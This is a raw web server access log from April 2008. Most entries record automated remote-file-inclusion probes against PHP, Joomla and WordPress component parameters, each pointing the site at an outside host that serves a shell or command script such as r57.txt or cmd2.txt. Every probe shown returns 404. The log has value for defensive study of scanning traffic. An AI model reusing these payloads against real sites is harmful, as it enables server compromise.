195.74.65.15 - - [06/Apr/2008:19:51:45 -0600] "GET /[Scriptftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
195.74.65.15 - - [06/Apr/2008:19:51:45 -0600] "GET /[Scriptftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
67.195.51.105 - - [06/Apr/2008:19:51:59 -0600] "GET /urchin/ HTTP/1.0" 200 814 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.105 - - [06/Apr/2008:19:52:09 -0600] "GET /urchin/index.cgi?urc HTTP/1.0" 200 237 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.105 - - [06/Apr/2008:19:52:29 -0600] "GET /urchin/index.cgi?top HTTP/1.0" 200 636 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.105 - - [06/Apr/2008:19:52:39 -0600] "GET /urchin/index.cgi?1101 HTTP/1.0" 200 27342 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.24.88 - - [06/Apr/2008:19:52:47 -0600] "GET /logs/error_log.20080406 HTTP/1.0" 200 540672 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.242 - - [06/Apr/2008:19:52:49 -0600] "GET /?N=A HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.242 - - [06/Apr/2008:19:52:59 -0600] "GET /?M=D HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.220.215.233 - - [06/Apr/2008:19:53:24 -0600] "GET /logs/access_log/main.php?x=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.808"
67.195.52.56 - - [06/Apr/2008:19:53:40 -0600] "GET /?S=A HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.114.135.126 - - [06/Apr/2008:19:53:46 -0600] "GET /logs/error_log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
58.120.225.104 - - [06/Apr/2008:19:54:03 -0600] "GET /logs/access_log.20080127//init_basic.php?GALLERY_BASEDIR=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
58.120.225.104 - - [06/Apr/2008:19:54:05 -0600] "GET /logs/access_log.20080127//init_basic.php?GALLERY_BASEDIR=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
74.220.215.233 - - [06/Apr/2008:19:55:22 -0600] "GET /logs/access_log.20080203/main.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.808"
74.220.215.233 - - [06/Apr/2008:19:55:23 -0600] "GET /main.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.808"
74.220.215.233 - - [06/Apr/2008:19:55:23 -0600] "GET /logs/main.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.808"
203.146.251.182 - - [06/Apr/2008:19:56:06 -0600] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://mabooshi.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 255 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
203.146.251.182 - - [06/Apr/2008:19:56:06 -0600] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://mabooshi.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 260 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
89.108.66.169 - - [06/Apr/2008:19:58:19 -0600] "GET /logs/error_log///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
89.108.66.169 - - [06/Apr/2008:19:58:45 -0600] "GET /logs/error_log///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
74.220.215.233 - - [06/Apr/2008:20:00:23 -0600] "GET /logs/access_log.20080127/template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.808"
74.220.215.233 - - [06/Apr/2008:20:00:23 -0600] "GET /template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.808"
74.220.215.233 - - [06/Apr/2008:20:00:23 -0600] "GET /logs/template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
89.218.85.18 - - [06/Apr/2008:20:00:49 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
89.218.85.18 - - [06/Apr/2008:20:00:49 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
213.173.177.11 - - [06/Apr/2008:20:00:51 -0600] "GET /logs/error_log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.76"
213.173.177.11 - - [06/Apr/2008:20:00:51 -0600] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.76"
213.173.177.11 - - [06/Apr/2008:20:00:51 -0600] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.76"
89.108.66.169 - - [06/Apr/2008:20:00:58 -0600] "GET /logs/error_log.20080330//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
89.108.66.169 - - [06/Apr/2008:20:00:58 -0600] "GET /logs/error_log.20080330//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
74.220.215.233 - - [06/Apr/2008:20:02:21 -0600] "GET /logs/access_log/main.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.808"
213.173.177.11 - - [06/Apr/2008:20:02:52 -0600] "GET /logs/access_log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 281 "-" "libwww-perl/5.76"
74.220.215.233 - - [06/Apr/2008:20:03:02 -0600] "GET /logs/access_log/template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
78.159.96.108 - - [06/Apr/2008:20:04:07 -0600] "GET /logs/access_log.20080106 HTTP/1.0" 404 218 "http://www.evolutionarts.net/logs/access_log.20080106" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
78.159.96.108 - - [06/Apr/2008:20:04:07 -0600] "GET / HTTP/1.0" 200 686 "http://www.evolutionarts.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
78.159.96.108 - - [06/Apr/2008:20:04:08 -0600] "GET / HTTP/1.0" 200 686 "http://www.evolutionarts.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
216.92.127.81 - - [06/Apr/2008:20:05:25 -0600] "GET /logs/samPHPweb/common/db.php?commonpath=http://www.youwilllistentowhatwesay.com/rayven//modules/Forums/admin/language/readme.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.69"
216.92.127.81 - - [06/Apr/2008:20:05:25 -0600] "GET /samPHPweb/common/db.php?commonpath=http://www.youwilllistentowhatwesay.com/rayven//modules/Forums/admin/language/readme.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.69"
201.63.191.212 - - [06/Apr/2008:20:06:01 -0600] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.jef.at/sp/vnc/r57.txt?? HTTP/1.1" 404 228 "-" "-"
64.191.104.52 - - [06/Apr/2008:20:08:23 -0600] "GET /logs/access_log.20080203/index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 240 "-" "libwww-perl/5.808"
64.191.104.52 - - [06/Apr/2008:20:08:23 -0600] "GET /index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 227 "-" "libwww-perl/5.808"
64.191.104.52 - - [06/Apr/2008:20:08:23 -0600] "GET /logs/index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
64.191.104.52 - - [06/Apr/2008:20:09:28 -0600] "GET /logs/access_log/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 248 "-" "libwww-perl/5.808"
213.16.114.162 - - [06/Apr/2008:20:11:01 -0600] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
201.63.191.212 - - [06/Apr/2008:20:12:43 -0600] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.jef.at/sp/vnc/r57.txt?? HTTP/1.1" 404 279 "-" "-"
203.146.251.182 - - [06/Apr/2008:20:13:14 -0600] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mabooshi.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 273 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
203.146.251.182 - - [06/Apr/2008:20:13:14 -0600] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mabooshi.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 278 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
201.63.191.212 - - [06/Apr/2008:20:15:06 -0600] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.jef.at/sp/vnc/r57.txt?? HTTP/1.1" 404 280 "-" "-"
203.146.251.123 - - [06/Apr/2008:20:15:17 -0600] "GET /logs/access_log.20080120/components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 272 "-" "libwww-perl/5.65"
203.146.251.123 - - [06/Apr/2008:20:15:17 -0600] "GET /components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
203.146.251.123 - - [06/Apr/2008:20:15:18 -0600] "GET /logs/components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
206.221.191.24 - - [06/Apr/2008:20:16:22 -0600] "GET /logs/access_log//admin.php?include_path=http://www.yourbesttype.com/id2.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
206.221.191.24 - - [06/Apr/2008:20:16:22 -0600] "GET //admin.php?include_path=http://www.yourbesttype.com/id2.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
206.221.191.24 - - [06/Apr/2008:20:16:22 -0600] "GET /logs//admin.php?include_path=http://www.yourbesttype.com/id2.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
206.221.191.24 - - [06/Apr/2008:20:16:26 -0600] "GET /logs/access_log//admin.php?include_path=http://www.yourbesttype.com/arab.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
206.221.191.24 - - [06/Apr/2008:20:16:26 -0600] "GET //admin.php?include_path=http://www.yourbesttype.com/arab.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
206.221.191.24 - - [06/Apr/2008:20:16:26 -0600] "GET /logs//admin.php?include_path=http://www.yourbesttype.com/arab.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
212.174.24.65 - - [06/Apr/2008:20:18:04 -0600] "GET /logs/access_log/main.php?x=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
201.63.191.212 - - [06/Apr/2008:20:18:48 -0600] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.jef.at/sp/vnc/r57.txt?? HTTP/1.1" 404 280 "-" "-"
91.121.106.21 - - [06/Apr/2008:20:20:09 -0600] "GET /logs/access_log//admin.php?include_path=http://www.yourbesttype.com/arab.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
91.121.106.21 - - [06/Apr/2008:20:20:09 -0600] "GET /logs/access_log//admin.php?include_path=http://www.yourbesttype.com/id2.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
91.121.106.21 - - [06/Apr/2008:20:20:09 -0600] "GET //admin.php?include_path=http://www.yourbesttype.com/arab.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
91.121.106.21 - - [06/Apr/2008:20:20:09 -0600] "GET //admin.php?include_path=http://www.yourbesttype.com/id2.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
91.121.106.21 - - [06/Apr/2008:20:20:09 -0600] "GET /logs//admin.php?include_path=http://www.yourbesttype.com/arab.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
91.121.106.21 - - [06/Apr/2008:20:20:09 -0600] "GET /logs//admin.php?include_path=http://www.yourbesttype.com/id2.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
206.221.191.24 - - [06/Apr/2008:20:20:28 -0600] "GET /logs/access_log//admin.php?include_path=http://www.yourbesttype.com/id.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
206.221.191.24 - - [06/Apr/2008:20:20:28 -0600] "GET //admin.php?include_path=http://www.yourbesttype.com/id.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
206.221.191.24 - - [06/Apr/2008:20:20:29 -0600] "GET /logs//admin.php?include_path=http://www.yourbesttype.com/id.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
84.19.178.201 - - [06/Apr/2008:20:20:58 -0600] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.indicce.com/admin/r57? HTTP/1.1" 404 238 "-" "libwww-perl/5.65"
200.105.35.14 - - [06/Apr/2008:20:23:35 -0600] "GET /logs/access_log/ashnews.php?pathtoashnews=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
213.215.80.102 - - [06/Apr/2008:20:23:53 -0600] "GET /logs/error_log.20080330/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
213.215.80.102 - - [06/Apr/2008:20:23:53 -0600] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
213.215.80.102 - - [06/Apr/2008:20:23:53 -0600] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
213.173.177.11 - - [06/Apr/2008:20:25:54 -0600] "GET /logs//index.php?option=com_cropimage&Itemid=&mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.76"
213.173.177.11 - - [06/Apr/2008:20:25:54 -0600] "GET //index.php?option=com_cropimage&Itemid=&mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.76"
70.82.51.98 - - [06/Apr/2008:20:28:43 -0600] "HEAD / HTTP/1.0" 200 0 "-" "PHP version tracker (http://www.nexen.net/phpversion/bot.php)"
66.232.102.34 - - [06/Apr/2008:20:29:29 -0600] "GET /logs/error_log.20080203/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gatesofzion.net/readme2.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.808"
66.232.102.34 - - [06/Apr/2008:20:29:29 -0600] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gatesofzion.net/readme2.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.808"
66.232.102.34 - - [06/Apr/2008:20:29:29 -0600] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gatesofzion.net/readme2.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.808"
74.52.169.116 - - [06/Apr/2008:20:29:38 -0600] "GET /cutenews//show_archives.php?cutepath=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
91.121.106.21 - - [06/Apr/2008:20:29:44 -0600] "GET /logs/access_log//admin.php?include_path=http://www.yourbesttype.com/id.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
91.121.106.21 - - [06/Apr/2008:20:29:44 -0600] "GET //admin.php?include_path=http://www.yourbesttype.com/id.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
91.121.106.21 - - [06/Apr/2008:20:29:44 -0600] "GET /logs//admin.php?include_path=http://www.yourbesttype.com/id.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
66.232.102.34 - - [06/Apr/2008:20:29:54 -0600] "GET /logs/access_log.20080203/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gatesofzion.net/readme2.txt?? HTTP/1.1" 404 292 "-" "libwww-perl/5.808"
69.72.221.90 - - [06/Apr/2008:20:30:02 -0600] "GET /components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
66.232.102.34 - - [06/Apr/2008:20:31:22 -0600] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gatesofzion.net/readme2.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.808"
66.232.102.34 - - [06/Apr/2008:20:31:22 -0600] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gatesofzion.net/readme2.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.808"
89.218.85.18 - - [06/Apr/2008:20:32:26 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
74.52.169.116 - - [06/Apr/2008:20:32:34 -0600] "GET //tools/send_reminders.php?noSet=0&includedir=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
213.215.80.102 - - [06/Apr/2008:20:33:07 -0600] "GET /logs/error_log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
200.105.35.14 - - [06/Apr/2008:20:33:37 -0600] "GET /logs/error_log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.65"
85.234.144.44 - - [06/Apr/2008:20:33:39 -0600] "GET /logs/error_log.20080203//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.808"
85.234.144.44 - - [06/Apr/2008:20:33:39 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.808"
85.234.144.44 - - [06/Apr/2008:20:33:39 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
85.234.144.44 - - [06/Apr/2008:20:33:39 -0600] "GET /logs/access_log.20080203//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.808"
203.146.251.123 - - [06/Apr/2008:20:34:00 -0600] "GET /logs/error_log.20080330/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 292 "-" "libwww-perl/5.65"
203.146.251.123 - - [06/Apr/2008:20:34:00 -0600] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 268 "-" "libwww-perl/5.65"
203.146.251.123 - - [06/Apr/2008:20:34:01 -0600] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 273 "-" "libwww-perl/5.65"
89.218.85.18 - - [06/Apr/2008:20:34:50 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
89.218.85.18 - - [06/Apr/2008:20:34:50 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
69.93.107.242 - - [06/Apr/2008:20:35:43 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://owell.us/bo.do?? HTTP/1.1" 404 242 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
69.93.107.242 - - [06/Apr/2008:20:35:44 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://owell.us/bo.do?? HTTP/1.1" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
64.72.119.130 - - [06/Apr/2008:20:35:55 -0600] "GET /logs/access_log//atom.php5?page=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
64.72.119.130 - - [06/Apr/2008:20:35:55 -0600] "GET //atom.php5?page=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.803"
64.72.119.130 - - [06/Apr/2008:20:35:56 -0600] "GET /logs//atom.php5?page=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.803"
85.214.73.237 - - [06/Apr/2008:20:36:04 -0600] "GET /logs/error_log.20080203//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/nyos/cmd1.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
85.214.73.237 - - [06/Apr/2008:20:36:05 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/nyos/cmd1.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
85.214.73.237 - - [06/Apr/2008:20:36:05 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/nyos/cmd1.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
85.214.73.237 - - [06/Apr/2008:20:36:05 -0600] "GET /logs/access_log.20080203//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/nyos/cmd1.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
200.105.35.14 - - [06/Apr/2008:20:36:46 -0600] "GET /logs/error_log/ashnews.php?pathtoashnews=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
203.146.251.123 - - [06/Apr/2008:20:37:34 -0600] "GET /logs/access_log.20080106/components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 272 "-" "libwww-perl/5.65"
118.127.2.108 - - [06/Apr/2008:20:37:38 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.firerunners.nl//test.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
118.127.2.108 - - [06/Apr/2008:20:37:38 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.firerunners.nl//test.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
66.98.140.99 - - [06/Apr/2008:20:37:47 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://irc0de.runhost.net/t.txt??? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
66.98.140.99 - - [06/Apr/2008:20:37:48 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://irc0de.runhost.net/t.txt??? HTTP/1.1" 404 255 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
66.98.140.99 - - [06/Apr/2008:20:37:49 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://irc0de.runhost.net/test.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
66.98.140.99 - - [06/Apr/2008:20:37:55 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://irc0de.runhost.net/test.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
85.114.135.126 - - [06/Apr/2008:20:38:47 -0600] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
81.89.137.99 - - [06/Apr/2008:20:39:11 -0600] "GET /logs/error_log.20080330/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
81.89.137.99 - - [06/Apr/2008:20:39:11 -0600] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
81.89.137.99 - - [06/Apr/2008:20:39:11 -0600] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
85.214.73.237 - - [06/Apr/2008:20:39:16 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/nyos/cmd1.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
85.214.73.237 - - [06/Apr/2008:20:39:16 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/nyos/cmd1.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
213.113.108.77 - - [06/Apr/2008:20:40:42 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
213.113.108.77 - - [06/Apr/2008:20:40:43 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
